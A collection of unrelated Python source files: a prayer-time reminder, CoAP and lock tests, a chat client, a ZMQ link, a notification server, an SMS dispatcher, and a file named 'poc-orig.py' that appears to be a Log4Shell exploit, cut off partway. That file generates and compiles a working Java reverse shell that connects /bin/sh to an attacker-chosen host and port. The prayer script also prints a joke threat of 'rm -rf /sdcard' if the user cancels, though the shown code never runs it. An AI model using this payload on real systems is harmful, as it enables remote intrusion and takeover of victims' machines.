lg+"""\n41. """+lw+"""Bima """+lg+"""118. """+lw+"""Kupang """+lg+"""195. """+lw+"""Pekan Baru """+lg+"""272. """+lw+"""Tamiang La"""+
lg+"""\n42. """+lw+"""Binjai """+lg+"""119. """+lw+"""Kutacane """+lg+"""196. """+lw+"""Pemalang """+lg+"""273. """+lw+"""Tanah Grog"""+
lg+"""\n43. """+lw+"""Bireuen """+lg+"""120. """+lw+"""Kutoarjo """+lg+"""197. """+lw+"""Pematangsi """+lg+"""274. """+lw+"""Tangerang"""+
lg+"""\n44. """+lw+"""Bitung """+lg+"""121. """+lw+"""Labuhan """+lg+"""198. """+lw+"""Pendopo """+lg+"""275. """+lw+"""Tanjung Ba"""+
lg+"""\n45. """+lw+"""Blitar """+lg+"""122. """+lw+"""Lahat """+lg+"""199. """+lw+"""Pinrang """+lg+"""276. """+lw+"""Tanjung En"""+
lg+"""\n46. """+lw+"""Blora """+lg+"""123. """+lw+"""Lamongan """+lg+"""200. """+lw+"""Pleihari """+lg+"""277. """+lw+"""Tanjung Pa"""+
lg+"""\n47. """+lw+"""Bogor """+lg+"""124. """+lw+"""Langsa """+lg+"""201. """+lw+"""Polewali """+lg+"""278. """+lw+"""Tanjung Pi"""+
lg+"""\n48. """+lw+"""Bojonegoro """+lg+"""125. """+lw+"""Larantuka """+lg+"""202. """+lw+"""Pondok Ged """+lg+"""279. """+lw+"""Tanjung Re"""+
lg+"""\n49. """+lw+"""Bondowoso """+lg+"""126. """+lw+"""Lawang """+lg+"""203. """+lw+"""Ponorogo """+lg+"""280. """+lw+"""Tanjung Se"""+
lg+"""\n50. """+lw+"""Bontang """+lg+"""127. """+lw+"""Lhoseumawe """+lg+"""204. """+lw+"""Pontianak """+lg+"""281. """+lw+"""Tapak Tuan"""+
lg+"""\n51. """+lw+"""Boyolali """+lg+"""128. """+lw+"""Limboto """+lg+"""205. """+lw+"""Poso """+lg+"""282. """+lw+"""Tarakan"""+
lg+"""\n52. """+lw+"""Brebes """+lg+"""129. """+lw+"""Lubuk Basu """+lg+"""206. """+lw+"""Prabumulih """+lg+"""283. """+lw+"""Tarutung"""+
lg+"""\n53. """+lw+"""Bukit Ting """+lg+"""130. """+lw+"""Lubuk Ling """+lg+"""207. """+lw+"""Praya """+lg+"""284. """+lw+"""Tasikmalay"""+
lg+"""\n54. """+lw+"""Bulukumba """+lg+"""131. """+lw+"""Lubuk Paka """+lg+"""208. """+lw+"""Probolingg """+lg+"""285. """+lw+"""Tebing Tin"""+
lg+"""\n55. """+lw+"""Buntok """+lg+"""132. """+lw+"""Lubuk Sika """+lg+"""209. """+lw+"""Purbalingg """+lg+"""286. """+lw+"""Tegal"""+
lg+"""\n63. """+lw+"""Cepu """+lg+"""133. """+lw+"""Lumajang """+lg+"""210. """+lw+"""Purukcahu """+lg+"""287. """+lw+"""Temanggung"""+
lg+"""\n57. """+lw+"""Ciamis """+lg+"""134. """+lw+"""Luwuk """+lg+"""211. """+lw+"""Purwakarta """+lg+"""288. """+lw+"""Tembilahan"""+
lg+"""\n58. """+lw+"""Cianjur """+lg+"""135. """+lw+"""Madiun """+lg+"""212. """+lw+"""Purwodadig """+lg+"""289. """+lw+"""Tenggarong"""+
lg+"""\n59. """+lw+"""Cibinong """+lg+"""136. """+lw+"""Magelang """+lg+"""213. """+lw+"""Purwokerto """+lg+"""290. """+lw+"""Ternate"""+
lg+"""\n60. """+lw+"""Cilacap """+lg+"""137. """+lw+"""Magetan """+lg+"""214. """+lw+"""Purworejo """+lg+"""291. """+lw+"""Tolitoli"""+
lg+"""\n61. """+lw+"""Cilegon """+lg+"""138. """+lw+"""Majalengka """+lg+"""215. """+lw+"""Putussibau """+lg+"""292. """+lw+"""Tondano"""+
lg+"""\n62. """+lw+"""Cimahi """+lg+"""139. """+lw+"""Majene """+lg+"""216. """+lw+"""Raha """+lg+"""293. """+lw+"""Trenggalek"""+
lg+"""\n63. """+lw+"""Cirebon """+lg+"""140. """+lw+"""Makale """+lg+"""217. """+lw+"""Rangkasbit """+lg+"""294. """+lw+"""Tual"""+
lg+"""\n64. """+lw+"""Curup """+lg+"""141. """+lw+"""Makassar """+lg+"""218. """+lw+"""Rantau """+lg+"""295. """+lw+"""Tuban"""+
lg+"""\n65. """+lw+"""Demak """+lg+"""142. """+lw+"""Malang """+lg+"""219. """+lw+"""Rantauprap """+lg+"""296. """+lw+"""Tulung Agu"""+
lg+"""\n66. """+lw+"""Denpasar """+lg+"""143. """+lw+"""Mamuju """+lg+"""220. """+lw+"""Rantepao """+lg+"""297. """+lw+"""Ujung Beru"""+
lg+"""\n67. """+lw+"""Depok """+lg+"""144. """+lw+"""Manna """+lg+"""221. """+lw+"""Rembang """+lg+"""298. """+lw+"""Ungaran"""+
lg+"""\n68. """+lw+"""Dili """+lg+"""145. """+lw+"""Manokwari """+lg+"""222. """+lw+"""Rengat """+lg+"""299. """+lw+"""Waikabubak"""+
lg+"""\n69. """+lw+"""Dompu """+lg+"""146. """+lw+"""Marabahan """+lg+"""223. """+lw+"""Ruteng """+lg+"""300. """+lw+"""Waingapu"""+
lg+"""\n70. """+lw+"""Donggala """+lg+"""147. """+lw+"""Maros """+lg+"""224. """+lw+"""Sabang """+lg+"""301. """+lw+"""Wamena"""+
lg+"""\n71. """+lw+"""Dumai """+lg+"""148. """+lw+"""Martapura """+lg+"""225. """+lw+"""Salatiga """+lg+"""302. """+lw+"""Watampone"""+
lg+"""\n72. """+lw+"""Ende """+lg+"""149. """+lw+"""Masohi """+lg+"""226. """+lw+"""Samarinda """+lg+"""303. """+lw+"""Watansoppe"""+
lg+"""\n73. """+lw+"""Enggano """+lg+"""150. """+lw+"""Mataram """+lg+"""227. """+lw+"""Sampang """+lg+"""304. """+lw+"""Wates"""+
lg+"""\n74. """+lw+"""Enrekang """+lg+"""151. """+lw+"""Maumere """+lg+"""228. """+lw+"""Sampit """+lg+"""305. """+lw+"""Wonogiri"""+
lg+"""\n75. """+lw+"""Fakfak """+lg+"""152. """+lw+"""Medan """+lg+"""229. """+lw+"""Sanggau """+lg+"""306. """+lw+"""Wonosari"""+
lg+"""\n76. """+lw+"""Garut """+lg+"""153. """+lw+"""Mempawah """+lg+"""230. """+lw+"""Sawahlunto """+lg+"""307. """+lw+"""Wonosobo"""+
lg+"""\n77. """+lw+"""Gianyar """+lg+"""154. """+lw+"""Menado """+lg+"""231. """+lw+"""Sekayu """+lg+"""308. """+lw+"""Yogyakarta""")
print(lg+'_'*63)
inp = input(lg+'Pilih kota Anda:'+x)
if int(inp) <= 82:
pass
elif int(inp) > 83 and int(inp) <= 204:
inp = str(int(inp)-1)
elif int(inp) >= 205:
inp = str(int(inp)-1)
else:
inp = '308'
ts = open('.cookie/ts','w')
ts.write(inp)
ts.close()
gettime()
# input
def start():
global s,d,a,m,i,tt,o,im,saur
try:
banner()
try:
o = open('.cookie/sc','r').read()
except IOError:
gettime()
o = open('.cookie/sc','r').read()
o = o.split(',')
if o[0] != tm('%d'):
gettime()
im= int(o[1].replace(':',''))
s = int(o[2].replace(':',''))
d = int(o[3].replace(':',''))
a = int(o[4].replace(':',''))
m = int(o[5].replace(':',''))
i = int(o[6].replace(':',''))
tt = int(tm('%H%M'))
saur = im - 100
if tt > s and tt < d:
ss = 'sholat Dzuhur'
elif tt > d and tt < a:
ss = 'sholat Ashar'
elif tt > a and tt < m:
ss = 'sholat Maghrib'
elif tt > m and tt < i:
ss = 'sholat Isya'
elif tt > i and im < s or tt < 2400 and im < s and tt < im:
ss = 'Imsak'
else:
ss = 'sholat Subuh'
banner()
print(f'''
{lg}Jadwal waktu sholat {lw}{tm('%d %B, %Y')}
{lg}untuk kota{lw} {o[7]}{lg} dan sekitarnya.
{lg}Imsak : {lw}{o[1]}
{lg}Subuh : {lw}{o[2]}
{lg}Dzuhur : {lw}{o[3]}
{lg}Ashar : {lw}{o[4]}
{lg}Maghrib : {lw}{o[5]}
{lg}Isya : {lw}{o[6]}
{lg}Sedang menantikan waktu {ss}..
ctrl + c untuk berhenti''')
while True:
tt = int(tm('%H%M'))
time = tm(f'{lw}%H{lg}:{lw}%M{lg}:{lw}%S{lg}')
if tt == s:
banner()
print (lw+f' {lg}SAATNYA ADZAN SUBUH{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdsholat()
start()
break
elif tt == d:
banner()
print (lw+f' {lg}SAATNYA ADZAN DZUHUR{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdsholat()
start()
break
elif tt == a:
banner()
print (lw+f' {lg}SAATNYA ADZAN ASHAR{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdsholat()
start()
break
elif tt == m:
banner()
print (lw+f' {lg}SAATNYA ADZAN MAGHRIB{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdsholat()
start()
break
elif tt == i:
banner()
print (lw+f' {lg}SAATNYA ADZAN ISYA{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdsholat()
start()
break
elif tt == im:
banner()
print (lw+f' {lg}WAKTU IMSAK{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya')
print (lg+'_'*63)
trdpuasa()
start()
break
elif tt == saur:
banner()
print (lw+f' {lg}WAKTUNYA BANGUN SAHUR GAN !!!{lw}\n untuk wilayah\n kota {o[7]} dan sekitarnya\n\n{lg}Credit:{x} https://youtu.be/EXjt18hF6UY')
print (lg+'_'*63)
trdpuasa()
start()
break
else:
print ('\rSekarang jam {} '.format(time),end=''),;sys.stdout.flush();sleep(1)
except KeyboardInterrupt:
menu()
def ani():
print('\n')
for i in random.choice(txt):
print(lg+str(i.replace('\n','')),end=''),;sys.stdout.flush();sleep(0.05)
sleep(2)
def suara():
if tm('%H:%M') == o[2]:
nada = '.fajr'
elif tm('%H:%M') == o[1]:
nada = '.ims'
elif int(tm('%H%M')) == saur:
nada = '.saur'
else:
nada = '.reg'
sp.call(['mpv '+nada],shell=True,stdout=sp.DEVNULL,stderr=sp.STDOUT)
def trdsholat():
global txt
txt = open('.__','r').readlines()
st = [lr,
'JANGAN DI CANCELL KALO ADZANNYA BUNYI, LANGSUNG SHOLAT AJA',
'KALO DI CANCELL AUTO RM -RF /SDCARD.',
'MOHON MAAF BUAT YANG INI, BIAR PADA SHOLAT,',
'KARENA SHOLAT ITU WAJIB.'
]
for i in st:
print(i.center(60))
ttt = Thread(name='adzan',target=suara)
ttt.start()
while ttt.isAlive():
ani()
def trdpuasa():
global txt
if int(tm('%H%M')) == saur:
txt = open('.___','r').readlines()
else:
txt = open('.____','r').readlines()
ttx = Thread(name='puasa',target=suara)
ttx.start()
while ttx.isAlive():
ani()
def banner():
sp.call('clear')
print(f'''
{lgr}:::::::{lg}╗{lgr}::{lg}╗ {lgr}::{lg}╗ {lgr}::::::{lg}╗ {lgr}::{lg}╗ {lgr}:::::{lg}╗ {lgr}::::::::{lg}╗
{lgr}::{lg}╔════╝{lgr}::{lg}║ {lgr}::{lg}║{lgr}::{lg}╔═══{lgr}::{lg}╗{lgr}::{lg}║ {lgr}::{lg}╔══{lgr}::{lg}╗╚══{lgr}::{lg}╔══╝
{lgr}:::::::{lg}╗{lgr}:::::::{lg}║{lgr}::{lg}║ {lgr}::{lg}║{lgr}::{lg}║ {lgr}:::::::{lg}║ {lgr}::{lg}║
╚════{lgr}::{lg}║{lgr}::{lg}╔══{lgr}::{lg}║{lgr}::{lg}║ {lgr}::{lg}║{lgr}::{lg}║ {lgr}::{lg}╔══{lgr}::{lg}║ {lgr}::{lg}║
{lgr}:::::::{lg}║{lgr}::{lg}║ {lgr}::{lg}║╚{lgr}::::::{lg}╔╝{lgr}:::::::{lg}╗{lgr}::{lg}║ {lgr}::{lg}║ {lgr}::{lg}║
╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝
{lw}Programmer Muslim Nggak Lupa Ibadah{lg}
{lg}[{x}Spesial Ramadhan 1440 H{lg}]
_______________________________________________________________
''')
def menu():
banner()
print(f'''
{lg}1.{lw} Aktifkan
{lg}2.{lw} Ganti kota
{lg}3.{lw} Update
{lg}4.{lw} Tentang
{lg}0.{lw} Keluar''')
p = input(lg+'\nSholat # '+x)
if p == '1':
start()
elif p == '2':
try:
sp.call('rm .cookie/ts')
except:
pass
gettown()
start()
elif p == '3':
update()
elif p == '4':
tentang()
else:
exit()
def update():
banner()
print(lr+'Jangan di cancell ya ukhty.. biar nggak error :*')
print(lg+'Cek jaringan..')
try:
get('https://github.com')
except requests.exceptions.ConnectionError:
print(lg+'Astaghfirullah .. Ukhty forgot to turn on the network')
exit()
print(lg+'Updating .. \ nLong time depends on the network, sabarr :)')
os.system('cd .. && rm -rf sholat')
sp.call(['cd .. && git clone https://github.com/karjok/sholat'],shell=True, stdout=sp.DEVNULL,stderr=sp.STDOUT)
print(lg+'Selesai mengupdate')
print(lg+'Memulai ulang..')
sleep(2)
os.system('cd ../sholat && python sholat.py')
def tentang():
banner()
print(f'''
{lg}Nama : {lw}Sholat
{lg}Versi : {lw}2.0 (update: 5 Mei 2019, 6:00PM)
{lg}Tanggal : {lw}31 Januari 2019, 2:18PM
{lg}Author : {lw}Karjok Pangesty
{lg}Tujuan : {lw}Mengingatkan kita pada
waktu sholat
{lg}Terimakasih : {lw}Allah SWT
Eka Pangesty, CRABS dan semua
umat Muslim seplanet bumi.
{lg}NB : {lw}Manusia nggak ada yang sempurna,
sama kaya tool ini.
Silahkan laporkan kritik atau saran
ke: - https://t.me/om_karjok
- https://facebook.com/karjok.pangesty.5
- @karjok.pangesty''')
input(lg+'just entering ')
menu()
def exit():
print(lg+'_'*63)
print('Thanks ukhty, \ nHope good health always 😙'+x)
if __name__=='__main__':
try:
os.mkdir('.cookie')
except OSError:
pass
menu()
|
coverage_testIPv6.py | from Queue import Queue
import random
import threading
import unittest
from coapclient import HelperClient
from coapserver import CoAPServer
from coapthon import defines
from coapthon.messages.option import Option
from coapthon.messages.request import Request
from coapthon.messages.response import Response
__author__ = 'Giacomo Tanganelli'
__version__ = "2.0"
class Tests(unittest.TestCase):
def setUp(self):
self.server_address = ("::1", 5683)
self.current_mid = random.randint(1, 1000)
self.server_mid = random.randint(1000, 2000)
self.server = CoAPServer("::1", 5683)
self.server_thread = threading.Thread(target=self.server.listen, args=(10,))
self.server_thread.start()
self.queue = Queue()
def tearDown(self):
self.server.close()
self.server_thread.join(timeout=25)
self.server = None
def _test_with_client(self, message_list): # pragma: no cover
client = HelperClient(self.server_address)
for message, expected in message_list:
if message is not None:
received_message = client.send_request(message)
if expected is not None:
if expected.type is not None:
self.assertEqual(received_message.type, expected.type)
if expected.mid is not None:
self.assertEqual(received_message.mid, expected.mid)
self.assertEqual(received_message.code, expected.code)
if expected.source is not None:
self.assertEqual(received_message.source, self.server_address)
if expected.token is not None:
self.assertEqual(received_message.token, expected.token)
if expected.payload is not None:
self.assertEqual(received_message.payload, expected.payload)
if expected.options:
self.assertEqual(len(received_message.options), len(expected.options))
for o in expected.options:
assert isinstance(o, Option)
option_value = getattr(expected, o.name.lower().replace("-", "_"))
option_value_rec = getattr(received_message, o.name.lower().replace("-", "_"))
self.assertEqual(option_value, option_value_rec)
client.stop()
def _test_with_client_observe(self, message_list): # pragma: no cover
client = HelperClient(self.server_address)
for message, expected in message_list:
if message is not None:
client.send_request(message, self.client_callback)
if expected is not None:
received_message = self.queue.get()
if expected.type is not None:
self.assertEqual(received_message.type, expected.type)
if expected.mid is not None:
self.assertEqual(received_message.mid, expected.mid)
self.assertEqual(received_message.code, expected.code)
if expected.source is not None:
self.assertEqual(received_message.source, self.server_address)
if expected.token is not None:
self.assertEqual(received_message.token, expected.token)
if expected.payload is not None:
self.assertEqual(received_message.payload, expected.payload)
if expected.options:
self.assertEqual(len(received_message.options), len(expected.options))
for o in expected.options:
assert isinstance(o, Option)
option_value = getattr(expected, o.name.lower().replace("-", "_"))
option_value_rec = getattr(received_message, o.name.lower().replace("-", "_"))
self.assertEqual(option_value, option_value_rec)
client.stop()
def client_callback(self, response):
print "Callback"
self.queue.put(response)
def test_not_allowed(self):
print "TEST_NOT_ALLOWED"
path = "/void"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.METHOD_NOT_ALLOWED.number
expected.token = None
exchange1 = (req, expected)
self.current_mid += 1
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.METHOD_NOT_ALLOWED.number
expected.token = None
exchange2 = (req, expected)
self.current_mid += 1
req = Request()
req.code = defines.Codes.PUT.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.METHOD_NOT_ALLOWED.number
expected.token = None
exchange3 = (req, expected)
self.current_mid += 1
req = Request()
req.code = defines.Codes.DELETE.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.METHOD_NOT_ALLOWED.number
expected.token = None
exchange4 = (req, expected)
self.current_mid += 1
self._test_with_client([exchange1, exchange2, exchange3, exchange4])
if __name__ == '__main__':
unittest.main()
|
client.py | import socket
import threading
nickname = input("Choose Your Nickname:")
if nickname == 'admin':
password = input("Enter Password for Admin:")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Connect to a host
client.connect(('127.0.0.1',5555))
stop_thread = False
def recieve():
while True:
global stop_thread
if stop_thread:
break
try:
message = client.recv(1024).decode('ascii')
if message == 'NICK':
client.send(nickname.encode('ascii'))
next_message = client.recv(1024).decode('ascii')
if next_message == 'PASS':
client.send(password.encode('ascii'))
if client.recv(1024).decode('ascii') == 'REFUSE':
print("Connection is Refused !! Wrong Password")
stop_thread = True
# Clients those are banned can't reconnect
elif next_message == 'BAN':
print('Connection Refused due to Ban')
client.close()
stop_thread = True
else:
print(message)
except:
print('Error Occured while Connecting')
client.close()
break
def write():
while True:
if stop_thread:
break
#Getting Messages
message = f'{nickname}: {input("")}'
if message[len(nickname)+2:].startswith('/'):
if nickname == 'admin':
if message[len(nickname)+2:].startswith('/kick'):
# 2 for : and whitespace and 6 for /KICK_
client.send(f'KICK {message[len(nickname)+2+6:]}'.encode('ascii'))
elif message[len(nickname)+2:].startswith('/ban'):
# 2 for : and whitespace and 5 for /BAN
client.send(f'BAN {message[len(nickname)+2+5:]}'.encode('ascii'))
else:
print("Commands can be executed by Admins only !!")
else:
client.send(message.encode('ascii'))
recieve_thread = threading.Thread(target=recieve)
recieve_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start() |
network.py | import zmq
import threading
import numpy as np
__author__ = "Ussama Zahid"
__email__ = "ussamazahid96@gmail.com"
# this file contains the defination for the ZMQ socket connection used to connect to the unity simulator
class ZMQPlug:
def __init__(self, state_ptr, queue, port=4567):
print("[Network Plug] Attaching Network Plug")
self.data_queue = queue
self.state_ptr = state_ptr
self.context = zmq.Context()
self.socket = self.context.socket(zmq.REP)
self.socket.bind("tcp://*:"+str(port))
self.running = True
message = None
print("[Network Plug] Waiting to connect...")
# waiting for the response from the unity simulator
while message is None and self.running:
message = self.socket.recv()
if message:
print("[Network Plug] Connected to {}.".format(message.decode("utf-8")))
self.socket.send(b"ack_reply")
# start the thread to send the current state of the drone to simulator
self.start_thread()
def send_state(self):
while self.running:
ack = self.socket.recv()
if ack:
data = np.copy(self.state_ptr)
out = data.astype(np.float64).tostring()
self.socket.send(out)
def start_thread(self):
self.thread_object = threading.Thread(target=self.send_state)
self.thread_object.start()
def close(self):
if self.running:
print("[Network Plug] Closing Connection....")
self.running = False
self.thread_object.join()
self.context.destroy() |
test_lock.py | import os
import subprocess
import sys
import threading
import traceback
from modelkit.assets.remote import RemoteAssetsStore
from tests import TEST_DIR
def _start_wait_process(lock_path, duration_s):
script_path = os.path.join(TEST_DIR, "assets", "resources", "lock.py")
result = None
def run():
nonlocal result
try:
cmd = [sys.executable, script_path, lock_path, str(duration_s)]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, _ = p.communicate()
stdout = stdout.decode("utf-8")
if p.returncode:
print("ERROR", p.returncode, stdout, flush=True)
raise Exception("lock.py failed")
result = stdout
except Exception:
traceback.print_exc()
t = threading.Thread(target=run)
t.daemon = True
t.start()
def join():
t.join()
return result
return join
def test_lock_file(working_dir):
# Start a bunch of process competing for lock
lock_path = os.path.join(working_dir, "lock")
threads = []
for _ in range(3):
t = _start_wait_process(lock_path, 2)
threads.append(t)
# For each process, collect the timestamp when it acquired and released
# the lock, as well at the number of wait loops.
ranges = []
while threads:
t = threads.pop()
res = t()
assert res is not None
lines = res.splitlines()
assert len(lines) == 2
start = lines[0]
end = lines[1]
ranges.append((float(start), float(end)))
ranges.sort()
# Check the range are exclusive: the lock works assuming it got hit
for i in range(len(ranges) - 1):
end = ranges[i][1]
start = ranges[i + 1][0]
assert end <= start
def test_lock_assetsmanager(capsys, working_dir):
assets_dir = os.path.join(working_dir, "assets_dir")
os.makedirs(assets_dir)
driver_path = os.path.join(working_dir, "local_driver")
os.makedirs(os.path.join(driver_path, "bucket"))
# push an asset
mng = RemoteAssetsStore(
driver={
"storage_provider": "local",
"bucket": driver_path,
},
storage_prefix="prefix",
)
data_path = os.path.join(TEST_DIR, "assets", "testdata", "some_data_folder")
mng.new(data_path, "category-test/some-data.ext")
# start 4 processes that will attempt to download it
script_path = os.path.join(TEST_DIR, "assets", "resources", "download_asset.py")
cmd = [
sys.executable,
script_path,
assets_dir,
driver_path,
"category-test/some-data.ext:0.0",
]
def run():
p = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
stdout, _ = p.communicate()
stdout = stdout.decode("utf-8")
print(stdout)
threads = []
for _ in range(2):
t = threading.Thread(target=run)
threads.append(t)
t.start()
for t in threads:
t.join()
captured = capsys.readouterr()
assert "__ok_from_cache__" in captured.out
assert "__ok_not_from_cache__" in captured.out
|
notification.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache 2.0 License.
import os
import threading
import http.server
import queue
import json
from contextlib import contextmanager
from loguru import logger as LOG
class PostQueueRequestHandler(http.server.BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
self.queue = server.queue
self.error_queue = server.error_queue
self.checker = server.checker
super(PostQueueRequestHandler, self).__init__(request, client_address, server)
def do_POST(self):
self.send_response(201)
self.end_headers()
content_length = int(self.headers["Content-Length"])
body = self.rfile.read(content_length)
if callable(self.checker) and not self.checker(body):
LOG.error(f"Notification is not in expected format: {body}")
self.error_queue.put(body)
else:
self.queue.put(body)
def log_message(self, format, *args):
pass
class ThreadingPostQueueServer(http.server.ThreadingHTTPServer):
def __init__(self, server_address, RequestHandlerClass, checker=None):
assert (
RequestHandlerClass is PostQueueRequestHandler
), "Should be initialised with PostQueueRequestHandler"
self.queue = queue.Queue()
self.error_queue = queue.Queue()
self.checker = checker
super(ThreadingPostQueueServer, self).__init__(
server_address, PostQueueRequestHandler
)
def get_queue(self):
return self.queue
def check_errors(self):
return self.error_queue.empty()
@contextmanager
def notification_server(server_info, checker=None):
host = None
port = []
if server_info is not None:
host, *port = server_info.split(":")
if not host or not (port and port[0]):
raise ValueError("Notification server host:port configuration is invalid")
else:
raise ValueError("Notification server host:port configuration is invalid")
with ThreadingPostQueueServer(
(host, int(port[0])), PostQueueRequestHandler, checker
) as server:
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
LOG.success("Notification server started")
try:
yield server
finally:
assert (
server.check_errors() is True
), "Notification server caught malformed notifications"
server.shutdown()
server.server_close()
|
smsdispatcher.py | from threading import Thread
from queue import Queue, Empty
from redis import Redis
import json, re, time
from datetime import datetime
from sms import SMS, BALANCE_USSD, NetworkStatus
LOGGER="SMSDispatcher"
TEN_MEGABYTES=10485760
FIVE_MINUTES=300.
PORT="/dev/ttyAMA0"
BAUD=9600
def taskWorker():
_redis=Redis()
_redis.set("sim800NetworkStatus", "Unknown")
_redis.set("sim800Balance","0")
_redis.set("sim800RSSI",0)
logger=logging.getLogger(LOGGER)
balanceRegExp=re.compile(r"£(\d){1,2}\.(\d){2}")
try:
sms=SMS(PORT,BAUD,logger=logger)
sms.setup()
if not sms.turnOn():
logger.critical("Failed to turn on SMS!")
return
if not sms.setEchoOff():
logger.critical("Failed to set SMS echo off!")
return
sms.setTime(datetime.now())
netStat="Unknown"
while netStat!="Good":
netStat=sms.getNetworkStatus()
if netStat is not None:
if netStat in (NetworkStatus.RegisteredHome, NetworkStatus.RegisteredRoaming):
netStat="Good"
elif netStat in (NetworkStatus.Searching,): netStat="Searching"
else: netStat="Bad"
else: netStat="Unknown"
_redis.set("sim800NetworkStatus", netStat)
checkBalance=True
statusCheckTime=0.
while True:
if taskQueue.empty():
if checkBalance:
checkBalance=False
balanceMsg=sms.sendUSSD(BALANCE_USSD)
logger.info("Balance message: {}".format(balanceMsg))
match=balanceRegExp.search(balanceMsg)
if match is not None:
balance=match.group(0)
logger.info("Balance amount: {}".format(balance))
_redis.set("sim800Balance",balance)
if (time.time()-statusCheckTime)>FIVE_MINUTES:
rssi=sms.getRSSI()
if rssi is not None: rssi=(rssi.value/4.)*100
else: rssi=0
_redis.set("sim800RSSI",rssi)
netStat=sms.getNetworkStatus()
if netStat is not None:
if netStat in (NetworkStatus.RegisteredHome, NetworkStatus.RegisteredRoaming):
netStat="Good"
elif netStat in (NetworkStatus.Searching,): netStat="Searching"
else: netStat="Bad"
else: netStat="Unknown"
_redis.set("sim800NetworkStatus", netStat)
statusCheckTime=time.time()
try: task=taskQueue.get(timeout=60)
except Empty: continue
if task is None: continue
phoneNumber=task.get('phoneNumber')
message=task.get('message')
if phoneNumber and message:
logger.info("Sending SMS: {}, {}".format(phoneNumber, message))
if sms.sendSMS(phoneNumber, message):
logger.info("SMS sent successfully")
checkBalance=True
else: logger.error("Failed to send SMS! {}, {}".format(phoneNumber, message))
else: logger.error("Task is not valid: {}".format(task))
taskQueue.task_done()
except Exception as e:
logger.critical("Exception in task thread: {}".format(e))
return
def main():
logger=logging.getLogger(LOGGER)
_redis=Redis()
pubsub=_redis.pubsub()
pubsub.subscribe(['sms'])
for msg in pubsub.listen():
if msg['channel']!=b'sms':
logger.debug("Got message unknown channel {}".format(msg['channel']))
continue
if msg['type']=='subscribe':
logger.info("Subscribed to channel")
continue
if msg['type']!='message':
logger.debug("Got unknown message type {}".format(msg['type']))
continue
try:
data=msg['data'].decode('utf-8')
data=json.loads(data)
except Exception as e:
logging.error("Failed to decode data: {}, {}".format(msg['data'], e))
continue
taskQueue.put(data)
if __name__=="__main__":
import sys, logging
from argparse import ArgumentParser
def exceptionHook(etype, evalue, etraceback):
from traceback import format_tb
logger=logging.getLogger(LOGGER)
logstr="{name}; {value}; {traceback}".format(
name=etype.__name__,
value=str(evalue) or "(None)",
traceback="\n".join(format_tb(traceback))
)
logger.critical(logstr)
for h in logger.handlers:
try: h.flush()
except: continue
parser=ArgumentParser(description="SMS Dispatcher.")
parser.add_argument("-d", "--debug", dest="debug", default=False,
action="store_true", help="turn on debug information")
parser.add_argument("-s", "--stdout", dest="stdout", default=False,
action="store_true", help="re-direct logging output to stdout")
options=parser.parse_args()
loglevel=logging.DEBUG if options.debug else logging.WARNING
logger=logging.getLogger(LOGGER)
if options.stdout: handler=logging.StreamHandler(sys.stdout)
else:
from logging.handlers import RotatingFileHandler
handler=RotatingFileHandler("./smsdispatcher.log", maxBytes=TEN_MEGABYTES, backupCount=5)
handler.setFormatter(logging.Formatter("%(asctime)s : %(levelname)s -> %(message)s"))
logger.addHandler(handler)
logger.setLevel(loglevel)
sys.excepthook=exceptionHook
taskQueue=Queue()
taskThread=Thread(target=taskWorker)
taskThread.start()
main() |
poc-orig.py | #!/usr/bin/env python3
import argparse
from colorama import Fore, init
import subprocess
import threading
from pathlib import Path
import os
from http.server import HTTPServer, SimpleHTTPRequestHandler
CUR_FOLDER = Path(__file__).parent.resolve()
def generate_payload(userip: str, lport: int) -> None:
program = """
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
public Exploit() throws Exception {
String host="%s";
int port=%d;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),
pe=p.getErrorStream(),
si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}
""" % (userip, lport)
# writing the exploit to Exploit.java file
p = Path("Exploit.java")
try:
p.write_text(program)
subprocess.run([os.path.join(CUR_FOLDER, "/home/kali/pentest/exploits/log4j/log4j-shell-poc/jdk1.8.0_102/bin/javac"), str(p)])
except OSError as e:
print(Fore.RED + f'[-] Something went wrong {e}')
raise e
else:
print(Fore.GREEN + '[+] Exploit java class created success')
def payload(userip: str, webport: int, lport: int) -> None:
generate_payload(userip, lport)
